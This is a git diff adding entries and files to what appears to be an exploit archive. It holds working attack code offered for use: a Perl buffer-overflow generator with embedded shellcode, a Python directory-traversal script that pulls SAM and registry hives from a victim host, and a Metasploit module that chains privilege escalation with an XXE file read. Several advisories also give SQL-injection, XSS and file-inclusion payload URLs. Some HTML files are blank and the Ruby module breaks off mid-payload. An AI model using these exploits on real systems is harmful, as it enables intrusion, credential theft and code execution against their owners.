diff --git a/files.csv b/files.csv
index 765b7593f..fb9675508 100755
--- a/files.csv
+++ b/files.csv
@@ -30107,3 +30107,19 @@ id,file,description,date,author,platform,type,port
33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0
33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
+33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 'login.php' Multiple SQL Injection Vulnerabilities",2009-12-18,R3d-D3V!L,php,webapps,0
+33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 'arbre.php' Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
+33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
+33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
+33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0
+33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002
+33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE",2014-05-19,"Brandon Perry",windows,webapps,80
+33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 'proxy.php' Cross Site Scripting Vulnerability",2009-12-22,"Edgard Chammas",php,webapps,0
+33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 update08.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0
+33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0
+33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 'MSP' Script Cross Site Scripting Vulnerability",2009-12-23,"Floyd Fuh",multiple,webapps,0
+33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 'myps.php' Cross Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
+33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
diff --git a/platforms/hardware/remote/33423.txt b/platforms/hardware/remote/33423.txt
new file mode 100755
index 000000000..ea8bb96c3
--- /dev/null
+++ b/platforms/hardware/remote/33423.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37432/info
+
+The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities.
+
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+
+The Barracuda Web Application Firewall 660 firmware 7.3.1.007 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33438.txt b/platforms/multiple/webapps/33438.txt
new file mode 100755
index 000000000..87e4e2c4e
--- /dev/null
+++ b/platforms/multiple/webapps/33438.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37451/info
+
+webMathematica is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/webMathematica/MSP\
diff --git a/platforms/php/webapps/33421.txt b/platforms/php/webapps/33421.txt
new file mode 100755
index 000000000..2494d5fb1
--- /dev/null
+++ b/platforms/php/webapps/33421.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37417/info
+
+Ampache is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Ampache 3.4.3 is vulnerable; other versions may also be affected.
+
+The following data is available:
+
+username : x' or ' 1=1
+password : x' or ' 1=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33422.txt b/platforms/php/webapps/33422.txt
new file mode 100755
index 000000000..6cd82d4fc
--- /dev/null
+++ b/platforms/php/webapps/33422.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37423/info
+
+JBC Explorer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+JBC Explorer 7.20 is vulnerable; other versions may also be affected.
+
+http://www.example.com/album/dirsys/arbre.php?0=search&last=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33424.txt b/platforms/php/webapps/33424.txt
new file mode 100755
index 000000000..2e3a7382b
--- /dev/null
+++ b/platforms/php/webapps/33424.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37435/info
+
+Kasseler CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+Kasseler CMS 1.3.4 Lite is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?module=[target]&do=View&id=">
+
+http://www.example.com/index.php?module=[target]&do=">
+
+http://www.example.com/index.php?module=Account&do=UserInfo&uname=">
diff --git a/platforms/php/webapps/33435.txt b/platforms/php/webapps/33435.txt
new file mode 100755
index 000000000..b49257936
--- /dev/null
+++ b/platforms/php/webapps/33435.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37446/info
+
+ClarkConnect Linux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ClarkConnect Linux 5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com:82/public/proxy.php?url=
\ No newline at end of file
diff --git a/platforms/php/webapps/33436.txt b/platforms/php/webapps/33436.txt
new file mode 100755
index 000000000..a8be96230
--- /dev/null
+++ b/platforms/php/webapps/33436.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37450/info
+
+PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
+http://www.example.com/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php
+http://www.example.com/php-calendar-1.1/update08.php?configfile=/etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/33437.txt b/platforms/php/webapps/33437.txt
new file mode 100755
index 000000000..76eaea02a
--- /dev/null
+++ b/platforms/php/webapps/33437.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37450/info
+
+PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
+http://www.example.com/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php
+http://www.example.com/php-calendar-1.1/update10.php?configfile=/etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/33439.txt b/platforms/php/webapps/33439.txt
new file mode 100755
index 000000000..12e6130f4
--- /dev/null
+++ b/platforms/php/webapps/33439.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37464/info
+
+MyBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MyBB 1.4.10 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/myps.php?action=donate&username="/>
+
+http://www.example.com/myps.php?action=donate&username=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33440.txt b/platforms/php/webapps/33440.txt
new file mode 100755
index 000000000..be6e0b252
--- /dev/null
+++ b/platforms/php/webapps/33440.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37473/info
+
+The iF Portfolio Nexus ('com_if_nexus') component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+The following example URI is available:
+
+http://www.example.com/[Yol]/index.php?option=com_kif_nexus&controller=[-LFI-]
+
+
diff --git a/platforms/windows/local/33426.pl b/platforms/windows/local/33426.pl
new file mode 100755
index 000000000..bc3a1dc39
--- /dev/null
+++ b/platforms/windows/local/33426.pl
@@ -0,0 +1,89 @@
+#!/usr/bin/perl
+
+######################################################################################################
+# Exploit Title: CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
+# Discovery date: 11-26-2013
+# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
+# Vulnerable Software/Version: CyberLink Power2Go 9 Essential 9.0.1002.0
+# Vendor Site: http://www.cyberlink.com/
+# Tested On: Windows XP SP3
+# Timeline:
+# -- 11/28/13: Initial contact to vendor requesting appropriate POC to provide vuln details
+# -- 12/03/13: Received appropriate submission POC, initial vuln details provided to vendor
+# -- 12/11/13: Vendor response indicating issue has been escalated to Development team
+# -- 12/17/13: Vendor response indicating RD team working on fix
+# -- 03/05/14: Requested status from vendor who indicated issue has been re-escalated to Development
+# -- 03/07/13: Vendor response indicating someone from Development would contact for more details
+# -- 03/07/14: Vendor response indicating product team working on fix, new release scheduled 3/28
+# -- 03/16/14: Additional details provided to vendor as requested
+# -- 04/06/14: Status update requested from vendor
+# -- 04/08/14: New build released, provided for testing; confirmed fix for this issue
+# Details:
+# -- Power2Go uses registry keys to set various attributes including the registered username
+# -- The registered username is loaded into memory for display when the "About" screen is opened
+# -- These registry values can be found here: HKEY_LOCAL_MACHINE\SOFTWARE\CyberLink\Power2Go9\9.0
+# -- It loads these values into memory without proper bounds checks which enables the exploit
+# To Exploit:
+# -- 1) Run created .reg file 2) Open Power2Go 3) Click on Power2Go Logo in the upper left corner
+# -- Once the registry has been modified, this exploit will be persistent and execute every time
+# -- the application is run and the "About" screen is opened
+######################################################################################################
+
+my $buffsize = 50000; # sets buffer size for consistent sized payload
+
+# construct the required start and end of the reg file
+my $regfilestart ="Windows Registry Editor Version 5.00\n\n";
+$regfilestart = $regfilestart . "[HKEY_LOCAL_MACHINE\\SOFTWARE\\CyberLink\\Power2Go9\\9.0]\n";
+$regfilestart = $regfilestart . "\"UserName\"="; # The UserName field is vulnerable
+
+my $junk = "T_v3rn1x" . ("\x41" x 4892); # offset to next seh
+my $nseh = "\x61\x62"; # overwrite next seh with popad + nop
+my $seh = "\xd0\x50"; # overwrite seh with unicode friendly pop pop ret
+
+# unicode venetian alignment
+my $venalign = "\x6e";
+$venalign = $venalign . "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (200 bytes)
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x2d\x12\x11"; # sub eax,0x11001200
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x50"; # push eax
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\xc3"; # ret
+
+my $nops = "\x71" x 236; # some unicode friendly filler before the shellcode
+
+# Calc.exe payload
+# msfpayload windows/exec CMD=calc.exe R
+# alpha2 unicode/uppercase
+my $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA".
+"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
+"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
+"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
+"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
+"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
+"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
+"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
+"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
+"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
+"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
+"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
+"QQ2LRCM0LJA";
+
+my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffer
+my $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junk
+my $buffer = $sploit.$fill; # assemble the final buffer
+
+my $regfile = $regfilestart . "hex: " . $buffer . $regfileend; # construct the reg file with hex payload to generate binary registry entry
+my $regfile = $regfilestart . "\"". $buffer . "\"";
+
+# write the exploit buffer to file
+my $file = "cyberlinkp2g9_bof.reg";
+open(FILE, ">$file");
+print FILE $regfile;
+close(FILE);
+print "Exploit file [" . $file . "] created\n";
+print "Buffer size: " . length($buffer) . "\n";
diff --git a/platforms/windows/remote/33431.html b/platforms/windows/remote/33431.html
new file mode 100755
index 000000000..2a6c47b0a
--- /dev/null
+++ b/platforms/windows/remote/33431.html
@@ -0,0 +1,55 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/33432.html b/platforms/windows/remote/33432.html
new file mode 100755
index 000000000..36332085b
--- /dev/null
+++ b/platforms/windows/remote/33432.html
@@ -0,0 +1,56 @@
+
+
+
+
+
+
diff --git a/platforms/windows/remote/33433.html b/platforms/windows/remote/33433.html
new file mode 100755
index 000000000..d9b986dbf
--- /dev/null
+++ b/platforms/windows/remote/33433.html
@@ -0,0 +1,54 @@
+
+
+
+
diff --git a/platforms/windows/webapps/33428.py b/platforms/windows/webapps/33428.py
new file mode 100755
index 000000000..565daa628
--- /dev/null
+++ b/platforms/windows/webapps/33428.py
@@ -0,0 +1,63 @@
+#!/usr/bin/python
+#
+# Exploit Title: SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal
+# Date: 04/28/2014
+# Exploit Author: Matt Schmidt (Syph0n)
+# Vendor Homepage: http://www.safenet-inc.com/
+# Software Link: http://c3.safenet-inc.com/downloads/2/1/21DAC8BE-72DE-4D32-85D4-6A1FC600581E/Sentinel%20Protection%20Installer%207.4.0.exe
+# Version: SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and Sentinel Keys Server 1.0.3
+# Tested on: Windows 7 and Windows XP SP2
+# CVE: CVE-2007-6483
+# Dork: intitle:"Sentinel Keys License Monitor"
+# Greets to norsec0de
+
+import sys, urllib2, argparse
+
+print '\n[+] SafeNet Sentinel Protection Server 7.0 - 7.4 Directory Traversal Exploit'
+print '[+] Written by Matt Schmidt (Syph0n)'
+print '[+] This script will download the registry hives, boot.ini and win.ini off the Target Windows box'
+print '[+] For Windows versions other than Windows XP you will have to append the --file option and specifiy a file\n'
+
+
+# Define Help Menu
+if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
+ print 'Usage:'
+ print './exploit.py --host [options]'
+ print ' : The victim host\n'
+ print ' Options:'
+ print ' --port The port the application is listening on (default: 7002)'
+ print ' --file Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'
+ sys.exit(1)
+
+# Parse Arguments
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required = True)
+parser.add_argument('--port', type = int, default = 7002)
+parser.add_argument('--file')
+args = parser.parse_args()
+
+# Define Variables
+host = args.host
+port = args.port
+if args.file is not None :
+ targetFile = [args.file]
+else:
+ targetFile = ['windows/repair/default', 'windows/repair/sam', 'windows/repair/system', 'windows/repair/software', 'windows/repair/security', 'boot.ini', 'windows/win.ini']
+
+# Send Exploit
+print '[+] Sending exploit!'
+
+# Loop for multiple files
+for path in targetFile:
+ # Define Directory Traversal path
+ url = "http://" + host + ":" + str(port) + "/../../../../../../../../../../../../../../" + str(path)
+
+ # Retrieve file(s)
+ exploit = urllib2.urlopen(url)
+ header = exploit.info()
+ size = int(header.getheaders("Content-Length")[0])
+ print "\n[+] Downloading: C:\%s ! Bytes: %s" % (path, size)
+ filename = url.rsplit('/',1)
+ with open(str(filename[1]), "wb") as contents:
+ contents.write(exploit.read())
+print '\n[+] Done!\n'
\ No newline at end of file
diff --git a/platforms/windows/webapps/33434.rb b/platforms/windows/webapps/33434.rb
new file mode 100755
index 000000000..8627d810c
--- /dev/null
+++ b/platforms/windows/webapps/33434.rb
@@ -0,0 +1,298 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Release Control Authenticated XXE',
+ 'Description' => %q{
+ This module take advantage of three separate vulnerabilities in order to
+ read an arbitrary text file from the file system with the privileges
+ of the web server. You must be authenticated, but can be unprivileged
+ since a privilege escalation vulnerability is used. Tested against
+ HP Release Control 9.20.0000, Build 395 installed with demo data.
+
+ The first vulnerability allows an unprivileged authenticated user to list
+ the current users, their IDs, and even their password hashes. Can't login
+ with hashes, but the ID is useful in the second vulnerability.
+
+ When a user changes their password, they post the ID of the user who
+ is going to have their password changed. Just replace it with the
+ admin ID and you change the admin password. You are now admin.
+
+ The third vulnerability is an XXE in the dashboard XML import mechanism.
+ This is what allows you to read the file from the file system.
+
+ This module is super ghetto half because it was an AMF application,
+ half because I worked on it longer than I wanted to.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Brandon Perry '
+ ],
+ 'References' =>
+ [
+ ],
+ 'DisclosureDate' => 'May 16 2014'
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "Base directory path", '/']),
+ OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
+ OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
+ OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
+ ], self.class)
+ end
+
+ def check
+ end
+
+ def run
+ print_status("Authenticating")
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path)
+ })
+
+ cookie = res.get_cookies
+
+ post = {
+ 'j_username' => datastore['USERNAME'],
+ 'j_password' => datastore['PASSWORD'],
+ 'buttonName' => ''
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ if res and res.headers['Location'] !~ /index.jsp/
+ fail_with("Authentication failed")
+ end
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
+ 'cookie' => cookie
+ })
+
+ cookie = cookie + res.get_cookies
+
+ #not sure why this always fails the first time. Whatever.
+ id = nil
+ while id == nil
+ id = get_admin_id(cookie)
+ end
+
+ print_status("Found admin id: " + id)
+ print_status("Changing admin's password...")
+
+ password = change_admin_password(cookie, id)
+ print_status("Changed admin password to: " + password)
+
+ post = {
+ 'j_username' => 'admin',
+ 'j_password' => password,
+ 'buttonName' => ''
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path)
+ })
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ if res.headers['Location'] !~ /index.jsp/
+ fail_with("Login failed")
+ end
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
+ 'cookie' => cookie
+ })
+
+ cookie = cookie + res.get_cookies
+
+ post = {
+ 'com.mercury.dashboard.screen_resolution_width' => 2560,
+ 'com.mercury.dashboard.arch.fieldtree.date.timeZone' => 300,
+ 'com.mercury.dashboard.arch.fieldtree.date.zeroTimeUser' => 1400274351481
+ }
+
+ #need to send this so that the next request doesn't fail
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'portal', 'PageView.jsp'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ print_status("Exploiting XXE...")
+
+ data = Rex::Text::decode_base64("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJjb20ubWVyY3VyeS5kYXNoYm9hcmQuYXJjaC5maWVsZHRyZWUuZm9ybUZvckZpZWxkdHJlZS4iDQoNClkNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iLmltcG9ydEZyb21GaWxlIjsgZmlsZW5hbWU9IkRhc2hib2FyZF9PYmplY3RzX0V4cG9ydF8yMDE0MDUxNC54bWwiDQpDb250ZW50LVR5cGU6IHRleHQveG1sDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiID5dPgo8RXhwb3J0TGlzdCB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48dmVyc2lvbj4yPC92ZXJzaW9uPjxNb2R1bGU+PG5hbWU+UmVsZWFzZSBDb250cm9sIERlZmF1bHQgTW9kdWxlPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC91dWlkPjxkZXNjcmlwdGlvbj4meHhlOzwvZGVzY3JpcHRpb24+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48YWxsb3dTZWxmU2VydmljZT5mYWxzZTwvYWxsb3dTZWxmU2VydmljZT48Y29waWFibGU+dHJ1ZTwvY29waWFibGU+PGFsbFVzZXJzQWNjZXNzPnRydWU8L2FsbFVzZXJzQWNjZXNzPjxwYWdlPjxwYWdlU2VxdWVuY2U+MDwvcGFnZVNlcXVlbmNlPjx0aXRsZT5UcmVuZHM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5MYXRlbnQgQ2hhbmdlcyBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+M2I3YmI2YWEwMjk3N2Y1Yzo2OTQwMjEwYjoxMTYzYmNiMzk0YTotN2ZkZjwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkxOF1bTGF0ZW50XTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlt3ZWVrXVtXZWVrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjI8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PHBvcnRsZXQ+PHRpdGxlPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MTJdW0FueV08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW9